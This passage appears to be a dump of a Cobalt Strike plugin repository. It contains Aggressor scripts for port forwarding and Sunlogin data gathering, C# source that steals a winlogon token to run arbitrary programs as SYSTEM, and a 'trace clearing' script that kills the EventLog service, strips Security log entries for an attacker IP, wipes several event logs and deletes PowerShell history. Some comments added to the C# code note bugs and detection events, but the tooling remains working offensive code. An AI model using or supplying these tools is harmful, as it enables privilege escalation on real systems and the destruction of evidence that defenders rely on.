item "&netsh端口转发删除"{ 583 | $set = "delete"; 584 | netsh_poort($bid, $set); 585 | } 586 | 587 | } 588 | 589 | menu "&常用软件信息收集"{ 590 | item "&向日葵信息收集"{ 591 | SunloginClient(GetBeaconId($bid)); 592 | } 593 | } 594 | } 595 | } 596 | -------------------------------------------------------------------------------- /权限维持/svchost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/svchost.exe -------------------------------------------------------------------------------- /权限维持/systemcmd_cs.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Diagnostics; 7 | using System.Runtime.InteropServices; 8 | 9 | namespace systemcmd_cs 10 | { 11 | class Program 12 | { 13 | [StructLayout(LayoutKind.Sequential)] 14 | internal struct LUID 15 | { 16 | internal int LowPart; 17 | internal int HighPart; 18 | } 19 | 20 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 21 | internal struct TOKEN_PRIVILEGES 22 | { 23 | internal Int32 PrivilegeCount; 24 | internal LUID Luid; 25 | internal Int32 Attributes; 26 | } 27 | 28 | private enum ProcessAccessTypes 29 | { 30 | PROCESS_TERMINATE = 0x00000001, 31 | PROCESS_CREATE_THREAD = 0x00000002, 32 | PROCESS_SET_SESSIONID = 0x00000004, 33 | PROCESS_VM_OPERATION = 0x00000008, 34 | PROCESS_VM_READ = 0x00000010, 35 | PROCESS_VM_WRITE = 0x00000020, 36 | PROCESS_DUP_HANDLE = 0x00000040, 37 | PROCESS_CREATE_PROCESS = 0x00000080, 38 | PROCESS_SET_QUOTA = 0x00000100, 39 | PROCESS_SET_INFORMATION = 0x00000200, 40 | PROCESS_QUERY_INFORMATION = 0x00000400, 41 | STANDARD_RIGHTS_REQUIRED = 0x000F0000, 42 | SYNCHRONIZE = 0x00100000, 43 | PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION | 44 | 
PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE | PROCESS_CREATE_PROCESS | PROCESS_SET_QUOTA | 45 | PROCESS_SET_INFORMATION | PROCESS_QUERY_INFORMATION | STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE 46 | } 47 | 48 | 49 | 50 | public const UInt32 TOKEN_ADJUST_PRIVILEGES = 0x0020; 51 | internal const int SE_PRIVILEGE_ENABLED = 0x00000002; 52 | public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001; 53 | public const UInt32 TOKEN_DUPLICATE = 0x0002; 54 | public const UInt32 TOKEN_IMPERSONATE = 0x0004; 55 | public const UInt32 TOKEN_QUERY = 0x0008; 56 | 57 | public const UInt32 LOGON_NETCREDENTIALS_ONLY = 0x00000002; 58 | 59 | enum SECURITY_IMPERSONATION_LEVEL 60 | { 61 | SecurityAnonymous, 62 | SecurityIdentification, 63 | SecurityImpersonation, 64 | SecurityDelegation 65 | } 66 | 67 | 68 | enum TOKEN_TYPE 69 | { 70 | TokenPrimary = 1, 71 | TokenImpersonation 72 | } 73 | 74 | 75 | public enum ACCESS_MASK : uint 76 | { 77 | DELETE = 0x00010000, 78 | READ_CONTROL = 0x00020000, 79 | WRITE_DAC = 0x00040000, 80 | WRITE_OWNER = 0x00080000, 81 | SYNCHRONIZE = 0x00100000, 82 | 83 | STANDARD_RIGHTS_REQUIRED = 0x000F0000, 84 | 85 | STANDARD_RIGHTS_READ = 0x00020000, 86 | STANDARD_RIGHTS_WRITE = 0x00020000, 87 | STANDARD_RIGHTS_EXECUTE = 0x00020000, 88 | 89 | STANDARD_RIGHTS_ALL = 0x001F0000, 90 | 91 | SPECIFIC_RIGHTS_ALL = 0x0000FFFF, 92 | 93 | ACCESS_SYSTEM_SECURITY = 0x01000000, 94 | 95 | MAXIMUM_ALLOWED = 0x02000000, 96 | 97 | GENERIC_READ = 0x80000000, 98 | GENERIC_WRITE = 0x40000000, 99 | GENERIC_EXECUTE = 0x20000000, 100 | GENERIC_ALL = 0x10000000, 101 | 102 | DESKTOP_READOBJECTS = 0x00000001, 103 | DESKTOP_CREATEWINDOW = 0x00000002, 104 | DESKTOP_CREATEMENU = 0x00000004, 105 | DESKTOP_HOOKCONTROL = 0x00000008, 106 | DESKTOP_JOURNALRECORD = 0x00000010, 107 | DESKTOP_JOURNALPLAYBACK = 0x00000020, 108 | DESKTOP_ENUMERATE = 0x00000040, 109 | DESKTOP_WRITEOBJECTS = 0x00000080, 110 | DESKTOP_SWITCHDESKTOP = 0x00000100, 111 | 112 | WINSTA_ENUMDESKTOPS = 0x00000001, 113 | 
WINSTA_READATTRIBUTES = 0x00000002, 114 | WINSTA_ACCESSCLIPBOARD = 0x00000004, 115 | WINSTA_CREATEDESKTOP = 0x00000008, 116 | WINSTA_WRITEATTRIBUTES = 0x00000010, 117 | WINSTA_ACCESSGLOBALATOMS = 0x00000020, 118 | WINSTA_EXITWINDOWS = 0x00000040, 119 | WINSTA_ENUMERATE = 0x00000100, 120 | WINSTA_READSCREEN = 0x00000200, 121 | 122 | WINSTA_ALL_ACCESS = 0x0000037F 123 | } 124 | 125 | 126 | public enum LogonFlags 127 | { 128 | WithProfile = 1, 129 | NetCredentialsOnly 130 | } 131 | 132 | public enum CreationFlags 133 | 134 | { 135 | 136 | DefaultErrorMode = 0x04000000, 137 | NewConsole = 0x00000010, 138 | NewProcessGroup = 0x00000200, 139 | SeparateWOWVDM = 0x00000800, 140 | Suspended = 0x00000004, 141 | UnicodeEnvironment = 0x00000400, 142 | ExtendedStartupInfoPresent = 0x00080000 143 | } 144 | 145 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 146 | internal struct STARTUPINFO 147 | { 148 | public Int32 cb; 149 | public string lpReserved; 150 | public string lpDesktop; 151 | public string lpTitle; 152 | public Int32 dwX; 153 | public Int32 dwY; 154 | public Int32 dwXSize; 155 | public Int32 dwYSize; 156 | public Int32 dwXCountChars; 157 | public Int32 dwYCountChars; 158 | public Int32 dwFillAttribute; 159 | public Int32 dwFlags; 160 | public Int16 wShowWindow; 161 | public Int16 cbReserved2; 162 | public IntPtr lpReserved2; 163 | public IntPtr hStdInput; 164 | public IntPtr hStdOutput; 165 | public IntPtr hStdError; 166 | } 167 | 168 | [StructLayout(LayoutKind.Sequential)] 169 | internal struct PROCESS_INFORMATION 170 | { 171 | public IntPtr hProcess; 172 | public IntPtr hThread; 173 | public int dwProcessId; 174 | public int dwThreadId; 175 | } 176 | 177 | [DllImport("advapi32.dll", SetLastError = true)] 178 | [return: MarshalAs(UnmanagedType.Bool)] 179 | static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle); 180 | 181 | [DllImport("advapi32.dll")] 182 | static extern bool 
LookupPrivilegeValue(string lpSystemName, string lpName,ref LUID lpLuid); 183 | 184 | 185 | [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)] 186 | [return: MarshalAs(UnmanagedType.Bool)] 187 | internal static extern bool AdjustTokenPrivileges(IntPtr tokenhandle,[MarshalAs(UnmanagedType.Bool)] bool disableAllPrivileges,[MarshalAs(UnmanagedType.Struct)]ref TOKEN_PRIVILEGES newstate,uint bufferlength, IntPtr previousState, IntPtr returnlength); 188 | 189 | [DllImport("kernel32.dll", SetLastError = true)] 190 | public static extern IntPtr OpenProcess(uint processAccess,bool bInheritHandle,uint processId); 191 | 192 | [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)] 193 | extern static bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess,IntPtr lpThreadAttributes,SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, TOKEN_TYPE TokenType,out IntPtr phNewToken); 194 | 195 | [DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)] 196 | public static extern bool CreateProcessWithTokenW(IntPtr hToken, UInt32 dwLogonFlags, string lpApplicationName, string lpCommandLine, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 197 | /* Enables SeDebugPrivilege on the current process token; returns false on the first failing API call. Review (defensive): hToken is never released (no CloseHandle anywhere in this file), PreviousState and ReturnLengthInBytes are unused locals, and a true return from AdjustTokenPrivileges is not proof the privilege was enabled - the API reports ERROR_NOT_ALL_ASSIGNED via GetLastError when the privilege is not held, which this code does not check. Detection note: a privilege being enabled on a token is typically recorded as Security event 4703 on Windows 10 / Server 2016 and later when the relevant audit subcategory is on. */ 198 | static bool EnablePrivilege() { 199 | IntPtr currenthandle = (IntPtr)Process.GetCurrentProcess().Handle; 200 | IntPtr hToken = IntPtr.Zero; 201 | LUID luidValue = new LUID(); 202 | TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES(); 203 | TOKEN_PRIVILEGES PreviousState = new TOKEN_PRIVILEGES(); 204 | UInt32 ReturnLengthInBytes = (UInt32)IntPtr.Zero; 205 | Console.WriteLine("[*] The Current Handle:"+ currenthandle); 206 | bool wdret = OpenProcessToken(currenthandle, TOKEN_ADJUST_PRIVILEGES, out hToken); 207 | if (wdret == false) { 208 | Console.WriteLine("[-] OpenProcessToken Failre,Error Code:" + Marshal.GetLastWin32Error()); 209 | return false; 210 | } 211 | 
Console.WriteLine("[*] The Token:" + hToken); 212 | bool privilege = LookupPrivilegeValue(null, "SeDebugPrivilege", ref luidValue); 213 | if (privilege == false) { 214 | Console.WriteLine("[-] LookupPrivilegeValue Failure,Error Code:" + Marshal.GetLastWin32Error()); 215 | return false; 216 | } 217 | Console.WriteLine("[*] LookupPrivilegeValue Sucess"); 218 | 219 | tp.PrivilegeCount = 1; 220 | tp.Luid = luidValue; 221 | tp.Attributes = SE_PRIVILEGE_ENABLED; 222 | bool bRet = AdjustTokenPrivileges(hToken, false, ref tp,(uint)IntPtr.Zero,IntPtr.Zero, IntPtr.Zero); 223 | if (bRet == false) { 224 | Console.WriteLine("[-] AdjustTokenPrivileges Failure,Error Code:" + Marshal.GetLastWin32Error()); 225 | return false; 226 | } 227 | Console.WriteLine("[*] AdjustTokenPrivileges Sucess"); 228 | return true; 229 | } 230 | /* Returns the PID of the first process whose image name matches processname, or 0 when none is running (the foreach returns on its first element, so a name with several instances picks one arbitrarily). */ 231 | static int FindPid(string processname) { 232 | Process[] process = Process.GetProcessesByName(processname); 233 | foreach (Process instace in process) { 234 | return instace.Id; 235 | } 236 | return 0; 237 | } 238 | /* Opens pid with PROCESS_QUERY_INFORMATION and returns a handle to its token opened for ASSIGN_PRIMARY|DUPLICATE|IMPERSONATE|QUERY, or IntPtr.Zero on failure. Review: the log text hard-codes "winlogon" although the target name is caller-supplied, and currentProcess is never closed. Detection note: this cross-process OpenProcess/OpenProcessToken against a privileged process is the kind of access Sysmon Event ID 10 (ProcessAccess) records, with the target image and granted-access mask. */ 239 | static IntPtr GetAccessToken(int pid) { 240 | IntPtr currentProcess = IntPtr.Zero; 241 | IntPtr Asstoken = IntPtr.Zero; 242 | currentProcess = OpenProcess((uint)ProcessAccessTypes.PROCESS_QUERY_INFORMATION, true, (uint)pid); 243 | if (currentProcess==IntPtr.Zero) { 244 | Console.WriteLine("[-] OpenProcess winlogon Failure,Error Code:"+ Marshal.GetLastWin32Error()); 245 | return IntPtr.Zero; 246 | } 247 | Console.WriteLine("[*] OpenProcess winlogon Sucess,OpenProcess:"+ currentProcess); 248 | bool wdret = OpenProcessToken(currentProcess, TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY, out Asstoken); 249 | if (wdret == false) 250 | { 251 | Console.WriteLine("[-] OpenProcessToken Failre,Error Code:" + Marshal.GetLastWin32Error()); 252 | return IntPtr.Zero; 253 | } 254 | Console.WriteLine("[*] OpenProcessToken Sucess:"+ Asstoken); 255 | return Asstoken; 256 | } 257 | /* Duplicates Token as a primary token and launches executepath under it with CreateProcessWithTokenW. Review: the duplicate is written back into the Token parameter so the original handle value is lost, neither token nor pi.hProcess/pi.hThread is closed, si.cb is left at 0 instead of Marshal.SizeOf(si), and lpCommandLine is null so no arguments reach the child. Detection note: the child shows up in Security 4688 / Sysmon Event ID 1 with a creator process whose account differs from the new process's account - a creator/child subject mismatch is a useful alerting signal for token-based launches like this. */ 258 | static bool Runprocess(IntPtr Token,string 
executepath) { 259 | bool dtx = DuplicateTokenEx(Token, (uint)ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, out Token); 260 | if (dtx == false) { 261 | Console.WriteLine("[-] DuplicateTokenEx Failure,Error Code:"+ Marshal.GetLastWin32Error()); 262 | return false; 263 | } 264 | Console.WriteLine("[*] DuplicateTokenEx Sucess,token:"+Token); 265 | STARTUPINFO si = new STARTUPINFO(); 266 | PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); 267 | bool ret = CreateProcessWithTokenW(Token, LOGON_NETCREDENTIALS_ONLY, executepath, null, CreationFlags.NewConsole, IntPtr.Zero, null, ref si, out pi); 268 | if (ret == false) { 269 | Console.WriteLine("[-] CreateProcessWithTokenW Failure,Error Code:"+ Marshal.GetLastWin32Error()); 270 | return false; 271 | } 272 | Console.WriteLine("[+] CreateProcessWithTokenW Sucess"); 273 | return true; 274 | 275 | } 276 | /* Entry point: args[0] is a process name (a ".exe" suffix is trimmed), args[1] the executable to start; returns 1 only for a wrong argument count. Review: GetAccessToken can return IntPtr.Zero and Runprocess is still called with it, the Runprocess result is discarded, and Main returns 0 on every other path including failures, so callers cannot tell success from failure. The usage string appears to have lost its placeholders on this page (presumably a <Process> <ExecutePath> pair in the original). */ 277 | static int Main(string[] args) 278 | { 279 | string processname; 280 | string executepath; 281 | if (args.Length == 2) 282 | { 283 | processname = args[0]; 284 | if (processname.Contains(".exe")) { 285 | processname = processname.Substring(0,processname.IndexOf(".exe")); 286 | } 287 | executepath = args[1]; 288 | } 289 | else { 290 | Console.WriteLine("Example:systemcmd_cs.exe #Process为进程名,ExecutePath为你要运行的EXE路径"); 291 | return 1; 292 | } 293 | 294 | Console.WriteLine("[*] Find ProcessName:"+processname); 295 | bool enable = EnablePrivilege(); 296 | if (enable == false) 297 | { 298 | Console.WriteLine("[-] Enable Privilege:SeDebugPrivilege Failure"); 299 | } 300 | else { 301 | int winlogonpid = FindPid(processname); 302 | if (winlogonpid != 0) 303 | { 304 | Console.WriteLine("[*] The winlogon PID:" + winlogonpid); 305 | IntPtr atoken=GetAccessToken(winlogonpid); 306 | Runprocess(atoken, executepath); 307 | } 308 | } 309 | return 0; 310 | 311 | } 312 | } 313 | } 314 | -------------------------------------------------------------------------------- 
/权限维持/systemcmd_cs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/systemcmd_cs.exe -------------------------------------------------------------------------------- /痕迹清除/README.md: -------------------------------------------------------------------------------- 1 | ## 指定Evtx清除 ## 2 | ![](img/evtxclear.png) 3 | 4 | ## Powershell执行历史清除 ## 5 | ![](img/powershellclear.png) 6 | 7 | ## rdp登录日志清除 ## 8 | ![](img/rdpclear.png) -------------------------------------------------------------------------------- /痕迹清除/clear.cna: -------------------------------------------------------------------------------- 1 | sub rdpclear { 2 | foreach $bid ($1){ 3 | if (-isadmin $bid){ 4 | bshell($bid, "tasklist /svc | findstr \"eventlog\"") 5 | bpowerpick($bid, "wevtutil epl Security C:\\Windows\\System32\\winevt\\Logs\\Security_new.evtx /q:\"*[EventData[(Data[@Name='IpAddress']='192.168.93.140')]]\" /ow:true;write-host \"[*] Dump IPAddress:127.0.0.1 New evtx\";\$envetlogpid=Get-WmiObject -Class win32_service -Filter \"name = 'eventlog'\" | select -exp ProcessId;write-host \"[*] Kill EventLog Process\";taskkill /F /PID \$envetlogpid;write-host \"[*] Move New Security Evtx ->\";Move-Item C:\\Windows\\System32\\winevt\\Logs\\Security_new.evtx C:\\Windows\\System32\\winevt\\Logs\\Security.evtx -force;write-host \"[*] Run Eventlog Service\";net start eventlog"); 6 | 7 | }else{ 8 | berror($bid, "非管理员权限") 9 | } 10 | } 11 | } 12 | 13 | sub powershellhistory{ 14 | $files = "C:\\Users\\$3['username']\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt"; 15 | brm($3["bid"], $files); 16 | } 17 | 18 | sub eventlogclear{ 19 | if($3["Security"] eq 'true'){ 20 | btask($3['bid'], "Clear EventLog Security"); 21 | bshell($3['bid'], "wevtutil cl Security"); 22 | } 23 | 24 | if($3["System"] eq 'true'){ 25 | btask($3['bid'], "Clear EventLog 
System"); 26 | bshell($3['bid'], "wevtutil cl System"); 27 | } 28 | 29 | if($3["Application"] eq 'true'){ 30 | btask($3['bid'], "Clear EventLog Application"); 31 | bshell($3['bid'], "wevtutil cl Application"); 32 | } 33 | 34 | if($3["Setup"] eq 'true'){ 35 | btask($3['bid'], "Clear EventLog Setup"); 36 | bshell($3['bid'], "wevtutil cl Setup"); 37 | } 38 | 39 | } 40 | 41 | popup beacon_bottom{ 42 | $bid = $1; 43 | menu "&痕迹清除"{ 44 | item "&RDP登录日志清除" { 45 | rdpclear($bid); 46 | } 47 | 48 | item "&powershell执行命令历史清除"{ 49 | foreach $id ($bid){ 50 | $dialog = dialog("PowerShell History Clear", %(username => "Administrator", bid => $id), &powershellhistory); 51 | dialog_description($dialog, "用于清除非windows powershell执行命令记录(Windows Server 2016以下执行的powershell命令不会存储)"); 52 | drow_text($dialog, "username", "username:"); 53 | dbutton_action($dialog, "run"); 54 | dialog_show($dialog); 55 | } 56 | } 57 | 58 | item "&清除指定日志"{ 59 | foreach $id ($bid){ 60 | $dialog = dialog("Eventlog Clear", %(bid => $id), &eventlogclear); 61 | dialog_description($dialog, "清除指定windows日志"); 62 | drow_checkbox($dialog, "Security", "Security Evtx", "Security"); 63 | drow_checkbox($dialog, "System", "System Evtx", "System"); 64 | drow_checkbox($dialog, "Application", "Application Evtx", "Application"); 65 | drow_checkbox($dialog, "Setup", "Setup Evtx", "Setup"); 66 | dbutton_action($dialog, "run"); 67 | dialog_show($dialog); 68 | } 69 | } 70 | } 71 | 72 | } -------------------------------------------------------------------------------- /痕迹清除/img/evtxclear.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/痕迹清除/img/evtxclear.png -------------------------------------------------------------------------------- /痕迹清除/img/powershellclear.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/痕迹清除/img/powershellclear.png -------------------------------------------------------------------------------- /痕迹清除/img/rdpclear.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/痕迹清除/img/rdpclear.png --------------------------------------------------------------------------------